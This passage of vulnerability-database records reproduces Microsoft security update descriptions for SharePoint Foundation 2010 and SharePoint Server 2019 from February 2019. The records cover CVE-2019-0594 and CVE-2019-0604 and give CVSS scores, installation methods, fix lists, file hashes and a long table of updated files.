"KB4462199", "href": "https://support.microsoft.com/en-us/help/4462199", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-28T09:33:56", "description": "None\n## Summary\n\nThis security update resolves vulnerabilities in Microsoft Office that could allow remote code execution if a user opens a specially crafted Office file. To learn more about these vulnerabilities, see [Microsoft Common Vulnerabilities and Exposures CVE-2019-0594](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0594>) and [Microsoft Common Vulnerabilities and Exposures CVE-2019-0604](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0604>). \n \n**Note** To apply this security update, you must have the release version of [Service Pack 2 for Microsoft SharePoint Foundation 2010](<http://support.microsoft.com/kb/2687464>) installed.\n\n## How to get and install the update\n\n### Method 1: Microsoft Update\n\nThis update is available through Windows Update. When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to turn on automatic updating, see [Windows Update: FAQ](<https://support.microsoft.com/en-us/help/12373/windows-update-faq>).\n\n### Method 2: Microsoft Update Catalog\n\nTo get the standalone package for this update, go to the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/Search.aspx?q=KB4461630>) website.\n\n### Method 3: Microsoft Download Center\n\nYou can get the standalone update package through the Microsoft Download Center. Follow the installation instructions on the download page to install the update.\n\n * [Download security update KB 4461630 for the 64-bit version of SharePoint Server 2010](<http://www.microsoft.com/download/details.aspx?familyid=ee157143-0ec3-4022-936e-be920b820b29>)\n\n## More Information\n\n### Security update deployment information\n\nFor deployment information about this update, see [security update deployment information: February 12, 2019](<https://support.microsoft.com/en-us/help/20190212>).\n\n### Security update replacement information\n\nThis security update replaces the previously released security update [4461580](<https://support.microsoft.com/help/4461580>).\n\n### File hash information\n\nFile name| SHA1 hash| SHA256 hash \n---|---|--- \nwssloc2010-kb4461630-fullfile-x64-glb.exe| C542F4C1207DBEE14AAD2EB6AF89F39DB8D1061E| 6851AE6B9FD07550CE028B53268D1FF44D2089097BABFF99189672A973DF8431 \n \n### File information\n\nDownload the [list of files that are included in security update KB 4461630](<http://download.microsoft.com/download/0/D/9/0D96B2D5-1A3F-4A2D-A7C9-00B6369A50B3/4461630.csv>).\n\n## How to get help and support for this security update\n\nHelp for installing updates: [Protect yourself online](<https://www.microsoft.com/safety/pc-security/updates.aspx>) \n \nHelp for protecting your Windows-based computer from viruses and malware: [Microsoft Security](<http://support.microsoft.com/contactus/cu_sc_virsec_master>) \n \nLocal support according to your country: [International Support](<https://www.microsoft.com/en-us/locale.aspx>)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-02-12T00:00:00", "type": "mskb", "title": "Description of the security update for SharePoint Foundation 2010: February 12, 2019", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0594", "CVE-2019-0604"], "modified": "2019-02-12T00:00:00", "id": "KB4461630", "href": "https://support.microsoft.com/en-us/help/4461630", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-28T09:34:02", "description": "None\n## Summary\n\nThis security update resolves vulnerabilities in Microsoft Office that could allow remote code execution if a user opens a specially crafted Office file. To learn more about these vulnerabilities, see [Microsoft Common Vulnerabilities and Exposures CVE-2019-0594](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0594>) and [Microsoft Common Vulnerabilities and Exposures CVE-2019-0604](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0604>).**Note** To apply this security update, you must have the release version of Microsoft SharePoint Server 2019 installed.\n\n## Improvements and fixes\n\nThis security update contains the following improvements and fixes:\n\n * When you run a search query that contains the SortList query parameter by using the REST interface, the query fails and generates a SearchServiceException exception. This can occur because the SortList parameter is case-sensitive.\n * When you index a document for search, the number of unique tokens per field is now increased from 10,000 to 1,000,000 before the document field is truncated.\n * The Search Service Application interface is now public. It is now possible to create a custom search application that uses the Search Service Application interface.\n * This update makes improvements to enable the new Japanese Era in SharePoint Server 2019 when it becomes available.\n * This update fixes an issue that affects SharePoint integration with Office Online Server. When you select the **Open in Word Online** option for a Word document, the document does not appear. This fix also improves the translation and localization of various strings in the modern features, such as modern lists and modern libraries.\n * This update fixes the Help link on some SharePoint Central Administration pages to point to Central Administration help instead of user help.\n * When you create a team site or classic team site in the central administration of SharePoint Server 2019 on-premises, the description references Office 365. This is inaccurate. The description is now more accurate. \n * This update adds the ability to change a task's duration type through the client-side object model (CSOM) after the task is created.\n * You can't set the description of a lookup table value to blank through the client-side object model (CSOM).\n * You can't get all the details of a dependency link, such as the lag duration and project UID properties, through the client-side object model (CSOM).\n * After a v2v upgrade from SharePoint Server 2016 to SharePoint Server 2019, PerformancePoint and User Profile service application databases do not have the expected compatibility level.\n * Because the multi-tenancy feature is unavailable in SharePoint Server 2019 on-premises, this update removes the multi tenancy option on the central administration page (Irmadmin.aspx) in SharePoint Server 2019.\n * Blob caching fails because the new logic to replace metabase access requires the local administrator permission for the application pool account.\n\n## How to get and install the update\n\n### Method 1: Microsoft Update\n\nThis update is available through Windows Update. When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to turn on automatic updating, see [Windows Update: FAQ](<https://support.microsoft.com/en-us/help/12373/windows-update-faq>).\n\n### Method 2: Microsoft Update Catalog\n\nTo get the standalone package for this update, go to the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/Search.aspx?q=KB4462171>) website.\n\n### Method 3: Microsoft Download Center\n\nYou can get the standalone update package through the Microsoft Download Center. Follow the installation instructions on the download page to install the update.\n\n * [Download security update KB 4462171 for the 64-bit version of SharePoint Server 2019](<http://www.microsoft.com/download/details.aspx?familyid=707d5d31-fd70-4938-a13a-6f096413f81a>)\n\n## More Information\n\n### Security update deployment information\n\nFor deployment information about this update, see [security update deployment information: February 12, 2019](<https://support.microsoft.com/en-us/help/20190212>).\n\n### Security update replacement information\n\nThis security update replaces previously released security update [4461634](<https://support.microsoft.com/help/4461634>).\n\n### File hash information\n\nsts2019-kb4462171-fullfile-x64-glb.exe| 04E9F564916CDB2B3B0177518F363517C100A599| DCD279114CDFA42196C3A793A9F09704689A745C21DC566FFA1666A49BA3E0D1 \n---|---|--- \n \n### File information\n\nThe English (United States) version of this software update installs files that have the attributes that are listed in the following table. The dates and times for these files are listed in Coordinated Universal Time (UTC). The dates and times for these files on your local computer are displayed in your local time together with your current daylight saving time (DST) bias. Additionally, the dates and times may change when you perform certain operations on the files.\n\n## \n\n__\n\nFor all supported x64-based versions of SharePoint Server 2019\n\nFile identifier| File name| File version| File size| Date| Time \n---|---|---|---|---|--- \nascalc.dll| ascalc.dll| 16.0.10341.20000| 1001096| 16-Jan-19| 09:43 \nmicrosoft.office.access.server.application.dll| microsoft.office.access.server.application.dll| 16.0.10341.20000| 616792| 16-Jan-19| 09:45 \naccsrv.layouts.root.accsrvscripts.js| accessserverscripts.js| | 575532| 16-Jan-19| 09:32 \nconversion.chartserver.dll| chartserver.dll| 16.0.10341.20000| 16094328| 16-Jan-19| 09:47 \nppt.conversion.chartserver.dll| chartserver.dll| 16.0.10341.20000| 16094328| 16-Jan-19| 09:47 \nppt.edit.chartserver.dll| chartserver.dll| 16.0.10341.20000| 16094328| 16-Jan-19| 09:47 \nwac.office.chartserver.dll| chartserver.dll| 16.0.10341.20000| 16094328| 16-Jan-19| 09:47 \nprodfeat.xml| feature.xml| | 616| 16-Jan-19| 09:33 \nastcmmn_js| assetcommon.js| | 18253| 16-Jan-19| 09:23 \nastpkrs_js| assetpickers.js| | 68292| 16-Jan-19| 09:23 \nsm.js| cmssitemanager.js| | 29279| 16-Jan-19| 09:24 \ncmssummarylinks_js| cmssummarylinks.js| | 6015| 16-Jan-19| 09:24 \neditmenu_js| editingmenu.js| | 11359| 16-Jan-19| 09:24 \nhierlist_js| hierarchicallistbox.js| | 30327| 16-Jan-19| 09:25 \nmediaplayer.js| mediaplayer.js| | 47725| 16-Jan-19| 09:24 \nptdlg.js| pickertreedialog.js| | 2950| 16-Jan-19| 09:23 \nselect_js| select.js| | 2387| 16-Jan-19| 09:23 \nslctctls_js| selectorcontrols.js| | 13288| 16-Jan-19| 09:23 \nserializ_js| serialize.js| | 3219| 16-Jan-19| 09:24 \nsp.ui.assetlibrary.ribbon.debug.js| sp.ui.assetlibrary.debug.js| | 13367| 16-Jan-19| 09:24 \nsp.ui.assetlibrary.js| sp.ui.assetlibrary.js| | 5455| 16-Jan-19| 09:23 \nsp.ui.pub.htmldesign.debug.js| sp.ui.pub.htmldesign.debug.js| | 38342| 16-Jan-19| 09:24 \nsp.ui.pub.htmldesign.js| sp.ui.pub.htmldesign.js| | 19407| 16-Jan-19| 09:25 \nsp.ui.pub.ribbon.debug.js| sp.ui.pub.ribbon.debug.js| | 146313| 16-Jan-19| 09:23 \nsp.ui.pub.ribbon.js| sp.ui.pub.ribbon.js| | 84979| 16-Jan-19| 09:23 \nsp.ui.rte.publishing.debug.js| sp.ui.rte.publishing.debug.js| | 98216| 16-Jan-19| 09:23 \nsp.ui.rte.publishing.js| sp.ui.rte.publishing.js| | 49716| 16-Jan-19| 09:24 \nsp.ui.spellcheck.debug.js| sp.ui.spellcheck.debug.js| | 68393| 16-Jan-19| 09:23 \nsp.ui.spellcheck.js| sp.ui.spellcheck.js| | 36522| 16-Jan-19| 09:24 \nsplchkpg_js| spellcheckentirepage.js| | 6653| 16-Jan-19| 09:24 \nspelchek_js| spellchecker.js| | 34657| 16-Jan-19| 09:23 \nvideoportal.js| videoportal.js| | 14742| 16-Jan-19| 09:24 \nmicrosoft.sharepoint.publishing.dll_isapi| microsoft.sharepoint.publishing.dll| 16.0.10341.20000| 5526672| 16-Jan-19| 09:53 \nsharepointpub.dll| microsoft.sharepoint.publishing.dll| 16.0.10341.20000| 5526672| 16-Jan-19| 09:53 \nsharepointpub_gac.dll| microsoft.sharepoint.publishing.dll| 16.0.10341.20000| 5526672| 16-Jan-19| 09:53 \nschema.xml_pubresfeap| schema.xml| | 44173| 16-Jan-19| 09:30 \nasctyps.xml| assetcontenttypes.xml| | 2846| 16-Jan-19| 09:44 \nasctyps2.xml| assetcontenttypes2.xml| | 2460| 16-Jan-19| 09:44 \nasflds.xml| assetfields.xml| | 1366| 16-Jan-19| 09:45 \nasflds2.xml| assetfields2.xml| | 1045| 16-Jan-19| 09:43 \naslibalt.xml| assetlibrarytemplate.xml| | 555| 16-Jan-19| 09:43 \naslibft.xml| feature.xml| | 2763| 16-Jan-19| 09:45 \naslibui.xml| provisionedui.xml| | 5075| 16-Jan-19| 09:44 \naslibui2.xml| provisionedui2.xml| | 1708| 16-Jan-19| 09:45 \ncdsele.xml| contentdeploymentsource.xml| | 637| 16-Jan-19| 09:53 \ncdsfeatu.xml| feature.xml| | 604| 16-Jan-19| 09:52 \ndocmpgcv.xml| docmpageconverter.xml| | 496| 16-Jan-19| 09:40 \ndocxpgcv.xml| docxpageconverter.xml| | 496| 16-Jan-19| 09:42 \nconvfeat.xml| feature.xml| | 766| 16-Jan-19| 09:41 \nippagecv.xml| infopathpageconverter.xml| | 577| 16-Jan-19| 09:41 \nxslappcv.xml| xslapplicatorconverter.xml| | 575| 16-Jan-19| 09:40 \nanalyticsreports.xml| analyticsreports.xml| | 2850| 16-Jan-19| 09:33 \nxspsset.xml| catalogsitesettings.xml| | 556| 16-Jan-19| 09:32 \nxspfeat.xml| feature.xml| | 1514| 16-Jan-19| 09:32 \ndepoper.xml| deploymentoperations.xml| | 2415| 16-Jan-19| 09:23 \ndepfeat.xml| feature.xml| | 788| 16-Jan-19| 09:25 \npestset.xml| enhancedhtmlediting.xml| | 157| 16-Jan-19| 09:52 \npefeat.xml| feature.xml| | 793| 16-Jan-19| 09:52 \nenthmft.xml| feature.xml| | 564| 16-Jan-19| 09:24 \nenthmset.xml| themingsitesettings.xml| | 1005| 16-Jan-19| 09:23 \nenctb.xml| enterprisewikicontenttypebinding.xml| | 559| 16-Jan-19| 09:37 \nenctb2.xml| enterprisewikicontenttypebinding2.xml| | 390| 16-Jan-19| 09:37 \nenfet.xml| feature.xml| | 1168| 16-Jan-19| 09:36 \nenct.xml| enterprisewikicontenttypes.xml| | 1456| 16-Jan-19| 09:24 \nenct2.xml| enterprisewikicontenttypes2.xml| | 1211| 16-Jan-19| 09:23 \nenlayfet.xml| feature.xml| | 1618| 16-Jan-19| 09:24 \nprov.xml| provisionedfiles.xml| | 1181| 16-Jan-19| 09:23 \nprov2.xml| provisionedfiles2.xml| | 1197| 16-Jan-19| 09:24 \newiki2.xml| feature.xml| | 766| 16-Jan-19| 09:41 \nhtmlfeat.xml| feature.xml| | 11263| 16-Jan-19| 09:54 \nhtmlcolm.xml| htmldesigncolumns.xml| | 909| 16-Jan-19| 09:54 \nhtmlcol2.xml| htmldesigncolumns2.xml| | 543| 16-Jan-19| 09:54 \nhtmlcol3.xml| htmldesigncolumns3.xml| | 597| 16-Jan-19| 09:53 \nhtmlcont.xml| htmldesigncontenttypes.xml| | 2330| 16-Jan-19| 09:53 \nhtmlfile.xml| htmldesignfiles.xml| | 657| 16-Jan-19| 09:54 \nhtmlfil2.xml| htmldesignfiles2.xml| | 771| 16-Jan-19| 09:53 \nhtmlfil3.xml| htmldesignfiles3.xml| | 895| 16-Jan-19| 09:53 \nhtmldpui.xml| htmldesignprovisionedui.xml| | 669| 16-Jan-19| 09:54 \nhtmldrib.xml| htmldesignribbon.xml| | 29320| 16-Jan-19| 09:53 \nhtmldpct.xml| htmldisplaytemplatecontenttypes.xml| | 11361| 16-Jan-19| 09:54 \nhtmldpwp.xml| htmldisplaytemplatefiles.xml| | 9302| 16-Jan-19| 09:53 \nhtmldpwp10.xml| htmldisplaytemplatefiles10.xml| | 575| 16-Jan-19| 09:54 \nhtmldpwp11.xml| htmldisplaytemplatefiles11.xml| | 1091| 16-Jan-19| 09:53 \nhtmldpwp12.xml| htmldisplaytemplatefiles12.xml| | 401| 16-Jan-19| 09:54 \nhtmldpwp13.xml| htmldisplaytemplatefiles13.xml| | 396| 16-Jan-19| 09:54 \nhtmldpwp14.xml| htmldisplaytemplatefiles14.xml| | 856| 16-Jan-19| 09:53 \nhtmldpwp15.xml| htmldisplaytemplatefiles15.xml| | 492| 16-Jan-19| 09:53 \nhtmldpwp2.xml| htmldisplaytemplatefiles2.xml| | 830| 16-Jan-19| 09:54 \nhtmldpwp3.xml| htmldisplaytemplatefiles3.xml| | 497| 16-Jan-19| 09:53 \nhtmldpwp4.xml| htmldisplaytemplatefiles4.xml| | 496| 16-Jan-19| 09:54 \nhtmldpwp5.xml| htmldisplaytemplatefiles5.xml| | 506| 16-Jan-19| 09:54 \nhtmldpwp6.xml| htmldisplaytemplatefiles6.xml| | 412| 16-Jan-19| 09:53 \nhtmldpwp7.xml| htmldisplaytemplatefiles7.xml| | 4003| 16-Jan-19| 09:53 \nhtmldpwp8.xml| htmldisplaytemplatefiles8.xml| | 399| 16-Jan-19| 09:53 \nhtmldpwp9.xml| htmldisplaytemplatefiles9.xml| | 401| 16-Jan-19| 09:54 \nhtmldtcbs.xml| htmldisplaytemplatefilesoobcbs.xml| | 580| 16-Jan-19| 09:54 \nhtmldtqb.xml| htmldisplaytemplatefilesqb.xml| | 598| 16-Jan-19| 09:54 \nhtmldtqbref.xml| htmldisplaytemplatefilesqbref.xml| | 507| 16-Jan-19| 09:53 \nhtmldpwp_recs.xml| htmldisplaytemplatefilesrecs.xml| | 418| 16-Jan-19| 09:54 \nststngimplk.xml| sitesettingsimportlink.xml| | 667| 16-Jan-19| 09:53 \naltmp.xam| alternatemediaplayer.xaml| | 35634| 16-Jan-19| 09:31 \nmwpfeat.xml| feature.xml| | 940| 16-Jan-19| 09:30 \nmwpprovf.xml| provisionedfiles.xml| | 1457| 16-Jan-19| 09:31 \nmwpprovu.xml| provisionedui.xml| | 22914| 16-Jan-19| 09:31 \nmwpprovui2.xml| provisionedui2.xml| | 2690| 16-Jan-19| 09:30 \npnfeat.xml| feature.xml| | 782| 16-Jan-19| 09:42 \npnstset.xml| navigationsitesettings.xml| | 4721| 16-Jan-19| 09:42 \nplnfeat.xml| feature.xml| | 760| 16-Jan-19| 09:42 \nplnstset.xml| navigationsitesettings.xml| | 152| 16-Jan-19| 09:40 \ntpfeat.xml| feature.xml| | 2846| 16-Jan-19| 09:30 \ntpcls.xml| pointpublishingcolumns.xml| | 701| 16-Jan-19| 09:31 \ntpcts.xml| pointpublishingcontenttypes.xml| | 488| 16-Jan-19| 09:31 \ntptltsch.xml| schema.xml| | 4088| 16-Jan-19| 09:24 \npclts.xml| schema.xml| | 2354| 16-Jan-19| 09:34 \npcltf.xml| feature.xml| | 857| 16-Jan-19| 09:50 \npclt.xml| productcataloglisttemplate.xml| | 753| 16-Jan-19| 09:49 \npcfeat.xml| feature.xml| | 1699| 16-Jan-19| 09:29 \npccol.xml| productcatalogcolumns.xml| | 6259| 16-Jan-19| 09:29 \npcct.xml| productcatalogcontenttypes.xml| | 830| 16-Jan-19| 09:29 \npcct2.xml| productcatalogcontenttypes2.xml| | 643| 16-Jan-19| 09:29 \npcprov.xml| provisionedfiles.xml| | 926| 16-Jan-19| 09:30 \npubpubpf.xml| feature.xml| | 551| 16-Jan-19| 09:56 \npppptset.xml| portalsettings.xml| | 584| 16-Jan-19| 09:56 \nctconvst.xml| contenttypeconvertersettings.xml| | 511| 16-Jan-19| 09:31 \ndoclbset.xml| documentlibrarysettings.xml| | 524| 16-Jan-19| 09:30 \neditmenu.xml| editingmenu.xml| | 470| 16-Jan-19| 09:31 \npubfeat.xml| feature.xml| | 2696| 16-Jan-19| 09:30 \npaglttmp.xml| pageslisttemplate.xml| | 516| 16-Jan-19| 09:31 \nprovui.xml| provisionedui.xml| | 40574| 16-Jan-19| 09:30 \nprovui2.xml| provisionedui2.xml| | 1489| 16-Jan-19| 09:30 \nprovui3.xml| provisionedui3.xml| | 2135| 16-Jan-19| 09:30 \npubstset.xml| publishingsitesettings.xml| | 6235| 16-Jan-19| 09:30 \nregext.xml| regionalsettingsextensions.xml| | 328| 16-Jan-19| 09:31 \nsiteacmn.xml| siteactionmenucustomization.xml| | 646| 16-Jan-19| 09:31 \nvarflagc.xml| variationsflagcontrol.xml| | 473| 16-Jan-19| 09:31 \nvarnomin.xml| variationsnomination.xml| | 613| 16-Jan-19| 09:31 \npblyfeat.xml| feature.xml| | 6194| 16-Jan-19| 09:48 \npblyprovfile.xml| provisionedfiles.xml| | 7964| 16-Jan-19| 09:49 \npblyprovfile2.xml| provisionedfiles2.xml| | 610| 16-Jan-19| 09:49 \npblyprovfile4.xml| provisionedfiles4.xml| | 308| 16-Jan-19| 09:48 \npblyprovfile5.xml| provisionedfiles5.xml| | 414| 16-Jan-19| 09:49 \npblyprovfile6.xml| provisionedfiles6.xml| | 385| 16-Jan-19| 09:48 \npblyprovfile7.xml| provisionedfiles7.xml| | 1170| 16-Jan-19| 09:49 \npblyprovfile8.xml| provisionedfiles8.xml| | 507| 16-Jan-19| 09:49 \npblyprovui.xml| provisionedui.xml| | 11330| 16-Jan-19| 09:49 \nxspfeatlayouts.xml| searchboundpagelayouts.xml| | 3671| 16-Jan-19| 09:49 \npubmelem.xml| elements.xml| | 4149| 16-Jan-19| 09:29 \npubmele2.xml| elements2.xml| | 592| 16-Jan-19| 09:30 \npubmfeat.xml| feature.xml| | 1697| 16-Jan-19| 09:30 \npubmprui.xml| provisionedui.xml| | 1548| 16-Jan-19| 09:30 \npubmstng.xml| sitesettings.xml| | 670| 16-Jan-19| 09:29 \npubprft.xml| feature.xml| | 758| 16-Jan-19| 09:23 \npubrfeat.xml| feature.xml| | 4927| 16-Jan-19| 09:48 \nprovfile.xml| provisionedfiles.xml| | 4739| 16-Jan-19| 09:48 \nprovfl4.xml| provisionedfiles4.xml| | 1394| 16-Jan-19| 09:48 \npubrcol.xml| publishingcolumns.xml| | 20566| 16-Jan-19| 09:48 \npubrctt.xml| publishingcontenttypes.xml| | 12093| 16-Jan-19| 09:47 \npubrctt2.xml| publishingcontenttypes2.xml| | 304| 16-Jan-19| 09:47 \npubrctt3.xml| publishingcontenttypes3.xml| | 500| 16-Jan-19| 09:48 \npubrcont.xml| publishingcontrols.xml| | 405| 16-Jan-19| 09:48 \nprsset.xml| publishingresourcessitesettings.xml| | 3506| 16-Jan-19| 09:47 \nupgd1.xml| upgrade1.xml| | 548| 16-Jan-19| 09:48 \nupgd2.xml| upgrade2.xml| | 486| 16-Jan-19| 09:48 \nupgd3.xml| upgrade3.xml| | 600| 16-Jan-19| 09:48 \npubtfeat.xml| feature.xml| | 1477| 16-Jan-19| 09:37 \nrollplf.xml| feature.xml| | 862| 16-Jan-19| 09:49 \nrollplpf.xml| provisionedfiles.xml| | 14529| 16-Jan-19| 09:50 \nrollplct.xml| rolluppagecontenttype.xml| | 742| 16-Jan-19| 09:50 \nrollpf.xml| feature.xml| | 816| 16-Jan-19| 09:46 \nrollps.xml| rolluppagesettings.xml| | 4091| 16-Jan-19| 09:44 \nseofeatu.xml| feature.xml| | 1253| 16-Jan-19| 09:55 \nseoopt.xml| searchengineoptimization.xml| | 3578| 16-Jan-19| 09:54 \nseoopt1.xml| searchengineoptimization1.xml| | 2904| 16-Jan-19| 09:55 \nsppelm.xml| elements.xml| | 1843| 16-Jan-19| 09:39 \nsppfea.xml| feature.xml| | 1015| 16-Jan-19| 09:40 \nsaicona.xml| consoleaction.xml| | 412| 16-Jan-19| 09:23 \nsaifeat.xml| feature.xml| | 1324| 16-Jan-19| 09:24 \nsairibn.xml| ribbon.xml| | 2895| 16-Jan-19| 09:24 \nsaisset.xml| sitesettings.xml| | 584| 16-Jan-19| 09:24 \naddtheme.xml| additionalthemes.xml| | 3819| 16-Jan-19| 09:49 \nsbwcopa.xml| colorpalette.xml| | 4813| 16-Jan-19| 09:49 \nsbwcona.xml| consoleaction.xml| | 692| 16-Jan-19| 09:49 \nsbwct.xml| contenttypes.xml| | 4261| 16-Jan-19| 09:49 \nsbwdesba.xml| designbuilderaction.xml| | 444| 16-Jan-19| 09:49 \nsbwdesea.xml| designeditoraction.xml| | 438| 16-Jan-19| 09:48 \nsbwdpa.xml| designpackageactions.xml| | 418| 16-Jan-19| 09:49 \nsbwdpr.xml| designpreviewaction.xml| | 447| 16-Jan-19| 09:48 \nsbwdmt.xml| disablesystemmasterpagetheming.xml| | 436| 16-Jan-19| 09:48 \nsbwfeat.xml| feature.xml| | 6499| 16-Jan-19| 09:49 \nsbwinsdes.xml| installeddesigns.xml| | 536| 16-Jan-19| 09:48 \nsbwmob.xml| mobilechannel.xml| | 1098| 16-Jan-19| 09:48 \nsbwpagela.xml| pagelayouts.xml| | 4119| 16-Jan-19| 09:48 \nsbwpages.xml| pages.xml| | 13120| 16-Jan-19| 09:49 \npubblogwp.xml| publishingblogwebparts.xml| | 949| 16-Jan-19| 09:48 \nsbwqd.xml| quicklaunchdatasource.xml| | 685| 16-Jan-19| 09:49 \nsbwrb.xml| ribbon.xml| | 44107| 16-Jan-19| 09:48 \nsbwsearch.xml| search.xml| | 2352| 16-Jan-19| 09:49 \nsbwsc.xml| sitecolumns.xml| | 3579| 16-Jan-19| 09:49 \nsbwsec.xml| siteelementcontrols.xml| | 952| 16-Jan-19| 09:49 \nsbwss.xml| sitesettings.xml| | 14657| 16-Jan-19| 09:49 \nsbwcss.xml| styles.xml| | 625| 16-Jan-19| 09:49 \nsbwwps.xml| webparts.xml| | 509| 16-Jan-19| 09:48 \nsbwfsf.xml| feature.xml| | 708| 16-Jan-19| 09:36 \nscfeatr.xml| feature.xml| | 856| 16-Jan-19| 09:48 \nspelchek.xml| spellchecking.xml| | 1033| 16-Jan-19| 09:47 \nspelchk2.xml| spellchecking2.xml| | 2641| 16-Jan-19| 09:47 \ncms_tenantadmindeploymentlinksfeature_feature_xml| feature.xml| | 826| 16-Jan-19| 09:31 \ncms_tenantadmindeploymentlinksfeature_links_xml| links.xml| | 542| 16-Jan-19| 09:31 \ntopicplf.xml| feature.xml| | 732| 16-Jan-19| 09:52 \ntopicpf.xml| feature.xml| | 713| 16-Jan-19| 09:47 \nplnkfeat.xml| feature.xml| | 621| 16-Jan-19| 09:37 \npublcol.xml| publishedlinkscolumns.xml| | 1206| 16-Jan-19| 09:36 \npublctt.xml| publishedlinkscontenttypes.xml| | 948| 16-Jan-19| 09:38 \nv2vpblyfeat.xml| feature.xml| | 540| 16-Jan-19| 09:43 \nv2vpblyprovfil.xml| provisionedfiles.xml| | 1934| 16-Jan-19| 09:43 \nvwfrmlk.xml| feature.xml| | 794| 16-Jan-19| 09:30 \nxmlsfeat.xml| feature.xml| | 818| 16-Jan-19| 09:53 \nxmlsitem.xml| xmlsitemap.xml| | 624| 16-Jan-19| 09:54 \nmicrosoft.cobaltcore.dll| microsoft.cobaltcore.dll| 16.0.10341.20000| 3090040| 16-Jan-19| 09:53 \nmicrosoft.cobalt.base.dll| microsoft.cobalt.base.dll| 16.0.10341.20000| 883320| 16-Jan-19| 09:56 \ncsisrv.dll| csisrv.dll| 16.0.10341.20000| 1298784| 16-Jan-19| 09:47 \ncsisrvexe.exe| csisrvexe.exe| 16.0.10341.20000| 355504| 16-Jan-19| 09:48 \nonfda.dll| onfda.dll| 16.0.10341.20000| 2130592| 16-Jan-19| 09:47 \ncolumnfiltering.ascx| columnfiltering.ascx| | 443| 17-Jan-19| 04:55 \ndocsettemplates.ascx| docsettemplates.ascx| | 1459| 17-Jan-19| 04:55 \nmetadatanavkeyfilters.ascx| metadatanavkeyfilters.ascx| | 4647| 17-Jan-19| 04:55 \nmetadatanavtree.ascx| metadatanavtree.ascx| | 2686| 17-Jan-19| 04:55 \nmultilangtemplates.ascx| transmgmtlibtemplates.ascx| | 3287| 17-Jan-19| 04:55 \nvideosettemplates.ascx| videosettemplates.ascx| | 1972| 17-Jan-19| 04:55 \neditdlg.htm_multilang| editdlg.htm| | 4796| 17-Jan-19| 04:55 \nfiledlg.htm_multilang| filedlg.htm| | 3344| 17-Jan-19| 04:55 \nediscoveryquerystatistics.ascx| ediscoveryquerystatistics.ascx| | 1357| 17-Jan-19| 04:55 \nediscoverytemplate.ascx| ediscoverytemplate.ascx| | 3267| 17-Jan-19| 04:55 \nbarcodeglobalsettings.ascx| barcodeglobalsettings.ascx| | 1473| 17-Jan-19| 04:55 \nbargensettings.ascx| bargensettings.ascx| | 1523| 17-Jan-19| 04:55 \ndropoffzoneroutingform.ascx| dropoffzoneroutingform.ascx| | 3528| 17-Jan-19| 04:55 \nrecordsribbon.ascx| recordsribbon.ascx| | 367| 17-Jan-19| 04:55 \nauditcustquery.ascx| auditcustomquery.ascx| | 11154| 17-Jan-19| 04:55 \nauditsettings.ascx| auditsettings.ascx| | 3594| 17-Jan-19| 04:55 \nbarcodesettings.ascx| barcodesettings.ascx| | 1399| 17-Jan-19| 04:55 \ndiscoveryglobalcontrol.ascx| discoveryglobalcontrol.ascx| | 5175| 17-Jan-19| 04:55 \ndiscoveryproperties.ascx| discoveryproperties.ascx| | 7132| 17-Jan-19| 04:55 \ndiscoveryquerystatistics.ascx| discoveryquerystatistics.ascx| | 3788| 17-Jan-19| 04:55 \ndlptemplatepicker.ascx| dlptemplatepicker.ascx| | 3594| 17-Jan-19| 04:55 \nlabelsettings.ascx| labelsettings.ascx| | 9510| 17-Jan-19| 04:55 \nretentionsettings.ascx| retentionsettings.ascx| | 11060| 17-Jan-19| 04:55 \ndw20.exe_0001| dw20.exe| 16.0.10341.20000| 2249080| 16-Jan-19| 09:23 \ndwtrig20.exe| dwtrig20.exe| 16.0.10341.20000| 327904| 16-Jan-19| 09:25 \nsltemp.asc| sldlibtemplates.ascx| | 12554| 16-Jan-19| 09:33 \nsldlib.js| sldlib.js| | 29295| 16-Jan-19| 09:53 \neditdlg.htm_slfeat| editdlg.htm| | 4796| 16-Jan-19| 09:28 \nfiledlg.htm_slfeat| filedlg.htm| | 3344| 16-Jan-19| 09:26 \nclientx.dll| microsoft.office.sharepoint.clientextensions.dll| 16.0.10341.20000| 390344| 16-Jan-19| 09:56 \nclientxr.dll.x64| microsoft.office.sharepoint.clientextensions.dll| 16.0.10341.20000| 390344| 16-Jan-19| 09:56 \nconversion.office.mso99lres.dll| mso99lres.dll| 16.0.10341.20000| 14543992| 16-Jan-19| 09:32 \nppt.conversion.mso99lres.dll| mso99lres.dll| 16.0.10341.20000| 14543992| 16-Jan-19| 09:32 \nppt.edit.mso99lres.dll| mso99lres.dll| 16.0.10341.20000| 14543992| 16-Jan-19| 09:32 \nwac.office.mso99lres.dll| mso99lres.dll| 16.0.10341.20000| 14543992| 16-Jan-19| 09:32 \nconversion.office.mso20win32server.dll| mso20win32server.dll| 16.0.10341.20000| 4582224| 16-Jan-19| 09:26 \nmso.mso20win32server.dll| mso20win32server.dll| 